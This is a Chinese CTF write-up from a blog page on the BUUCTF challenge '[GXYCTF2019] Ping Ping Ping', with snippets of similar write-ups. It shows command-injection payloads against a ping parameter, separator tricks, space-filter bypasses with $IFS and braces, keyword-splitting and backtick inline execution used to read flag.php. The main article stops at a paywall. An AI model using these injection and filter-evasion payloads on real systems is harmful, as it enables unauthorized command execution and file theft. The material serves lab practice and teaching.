buuctf[GXYCTF2019]Ping Ping Ping

最新推荐文章于 2024-03-29 00:08:37 发布
最新推荐文章于 2024-03-29 00:08:37 发布
阅读量5k 收藏 4
点赞数
分类专栏: 命令执行漏洞 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hintll/article/details/123645116
版权

buuctf[GXYCTF2019]Ping Ping Ping
在这里插入图片描述
这个题目的标题是pingping盲猜是关于命令执行的题目

打开环境后在这里插入图片描述

只有一个/ip=?
应该是提示用get的方式来传参一个地址执行ping的操作
直接ping127.0.0.1
在这里插入图片描述回显ping127.0.0.1的数据
说明是一道命令执行的题目
执行:?ip=127.0.0.1|ls
其中|的作用是命令分隔符
还有相关的符号
; --在 shell 中,是”连续指令”
& --不管第一条命令成功与否,都会执行第二条命令
&& --第一条命令成功,第二条才会执行
| --第一条命令的结果,作为第二条命令的输入
|| --第一条命令失败,第二条才会执行
这里采用|来执行
如果全部过滤
过滤了命令分割符,用%0a便可以分隔命令进行查看
127.0.0.1%0als

在这里插入图片描述
回显两个文件
直接访问flag.php
在这里插入图片描述回显有过滤空格

既然过滤空格就绕过空格
常见的绕过符号有:
$IFS 9 、 9 、 9IFS 1 、 1、 1{IFS} 、%09(php环境下)、 重定向符<>、<、
{cat,flag.php} //用逗号实现了空格功能

采用{cat,flag.php} //用逗号实现了空格功能
构造payload:?ip=127.0.0.1|cat,flag.php
在这里插入图片描述
回显过滤了flag这个字符串
尝试拼接绕过;
a=fl;b=ag;

最低0.47元/天 解锁文章
hint=flag
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GXYCTF2019]Ping Ping Ping - RCE(空格、关键字绕过[3种方式])
oZuoShen123的博客
10-11 627
/?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo preg_match("/\&|\/|\?|\*|\|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); die("fxck your symbol!"); } else if(preg_match("/ /", $ip)){ die("fxck your space!"); } else
Linux批量pingIP地址
最新发布
05-17
在Linux系统中,通过shell脚本读取IP列表,进行批量ping操作,并记录结果
[GXYCTF 2019]Ping Ping Ping
m0_73612768的博客
12-26 1062
ping 命令执行。本题三种解法,反引号,赋值,base64 加密。
BUUCTF[GXYCTF2019]Ping Ping Ping
2301_78136321的博客
09-26 592
cat$IFS$1fla$a.php,发现页面没有变化,也没有被过滤。五,因为flag被过滤,需要寻找绕过方法,需要查看源代码,检查绕过规则.输入/?七,查看网络源代码,可发现flag为flag{71fc3286-23fd-4032-a67b-ee9ff4b9a06d}三,利用Linux命令cat flag.php命令进行文件查看.发现空格被过滤,进行绕过。四,全部进行实验可以发现只有$IFS$1可以绕过但同时也发现flag也被过滤。一,打开题目,发现可以进行ping操作,在/?
[GXYCTF2019]Ping Ping Ping
qq_37466661的博客
08-27 3329
[GXYCTF2019]Ping Ping Ping CTF 命令执行
BUUCTF [GXYCTF2019]Ping Ping Ping
m0_49025459的博客
04-30 688
题目 打开网站 就这么点东西,啥都没有,那么我们浅试一下 那我们ls一下将文件名都输出出来,我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句,例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错,才执行后面的语句,所以前面的语句必须为假,例如 ping 1||whoami &前面的...
[GXYCTF2019]Ping Ping Ping 【多解】
PromisingQ
07-31 674
[GXYCTF2019]Ping Ping Ping 进入靶场环境:     加上题目是ping ping ping  所以可以猜测是需要我们命令执行读取flag 加上?ip=127.0.0.1 http://3d59e365-7e67-4e43-b2f5-dec887255281.node3.buuoj.cn/?ip=127.0.0.1    可以看到页面成功返回,我们尝试使用管道符执行我们想要执行的命令 ?ip=127.0.0.1 | ls 这个时候
BUUCTF-Ping Ping Ping
weixin_51383898的博客
10-07 250
启动靶机,页面提示可以传入的参数为ip=尝试ping一下本地IP地址尝试使用拼接符,空格(space)字符被过滤了,不得行删除空格字符获取当前目录有哪些文件,发现有flag.php和index.php尝试直接读取flag.php文件,不可行,忘记空格被过滤了绕过了空格,flag又被过滤了这时候,还有一个index.php源码文件,尝试读取查阅资料可得,preg_match()函数是PHP中用于匹配正则表达式的函数之一。该函数用来,并将结果存储在一个数组中,。
LabVIEW实现网络Ping IP测试
07-10
在这个“LabVIEW实现网络Ping IP测试”的项目中,我们可以通过LabVIEW编写程序来模拟操作系统中的ping命令,对指定的IP地址进行连通性检测。 **一、LabVIEW基础知识** 1. **图形化编程**:LabVIEW采用G语言...
Ping命令实现的扩充
09-27
实验内容:Ping命令实现的扩充,在给定的Ping程序的基础上做如下功能扩充: ? -h 显示帮助信息 ? -b 允许ping一个广播地址,只用于IPv4 ? -t 设置ttl值,只用于IPv4 ? -q 安静模式。不显示每个收到的包的分析结果,...
批量PingTelnet检测
12-25
批量Ping和Telnet检测是网络管理员常用的两种网络连通性检查工具,它们在IT领域中扮演着重要角色,尤其在大型网络环境中。批量检测能够大大提高工作效率,帮助快速定位网络问题。 **批量Ping检测** 批量Ping检测是...
Labview ping IP.vi
01-07
通过程序来ping设备的IP地址,这样就可以确认当前设备是否已经正确连接到电脑。在连接设备之前可以判断
buuctfPing Ping Ping(命令执行)
zzqzzq11的博客
08-06 1321
buuctf
BUUCTF__[GXYCTF2019]Ping Ping Ping_题解
风过江南乱的博客
06-25 3061
前言 我感觉我是一个假的理科生,假的计算机相关专业学生,完全没有该有的样子 这题有点东西,不算太水。只是对我来说。 读题 题目是Ping,打开也没有内容,就一个get传参的ip变量 不过看到ip和ping就容易联想到,终端ping命令。 先尝试传入一个ip=127.0.0.1,于是乎出现了如下,在终端下执行的效果就是这样,命令执行石锤了。 命令执行可以干很多事,也就是命令行,LInux下大佬们日常操作都用命令行代替鼠标。 首先想到用什么办法?让它执行我们需要的命令。很明显变量ip是突破点。 先看传
[GXYCTF2019]Ping Ping Ping(wp)
wikey 的博客
03-29 329
Ping 是Windows系列自带的一个可执行命令,从98到最新的2003 Server版的计算机都带有这个命令行工具。Ping 命令通过向计算机发送 ICMP 回应报文并且监听回应报文的返回,以校验与远程计算机或本地计算机的连接。对于每个发送报文, Ping 最多等待 1 秒,并打印发送和接收把报文的数量。默认情况下,发送四个回应报文,每个报文包含 64 字节的数据。Ping向目标主机(地址)发送一个回送请求数据包,要求目标主机收到请求后给予答复,从而判断网络的响应时间和本机是否与目标主机(地址)。
BUUCTF-[GXYCTF2019]Ping Ping Ping
qq_62875941的博客
12-28 383
打开链接 /?ip=(GET传参方式) 这题跟[ACTF2020 新生赛]Exec1差不多 那我们先看看有啥文件 /?ip=;ls或者/?ip=127.0.0.1;ls (ip地址写啥都行,其中127.0.0.1ping的是本机的地址) 发现里面有flag.php文件 但是当我去查看flag文件时,发现flag、空格、/、\等符号都被过滤了,当时也在这卡了很久 下面来总结一下常见的绕过方法 1.空格 (1)%20 (2)%09 (3)<> (4)$..
BUUCTF[GXYCTF2019]PingPingPing
weixin_45253622的博客
05-06 466
测试:?ip=127.0.0.1 测试:?ip=1&whoami 怀疑&被过滤,使用;替代: 发现可以,然后我们看看ls ?ip=1;ls 测试:/?ip=1;cat /flag 被过滤掉了,但是我们不知道什么
BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
algae
08-29 9609
BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换 0x00 考点 1、命令绕过空格方法有: $IFS$1、${IFS}$1、 {IFS}、IFS 2、内联执行 内联,就是将反引号内命令的输出作为输入执行 ?ip=127.0.0.1;cat$IFS$9`ls` $IFS在Li

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值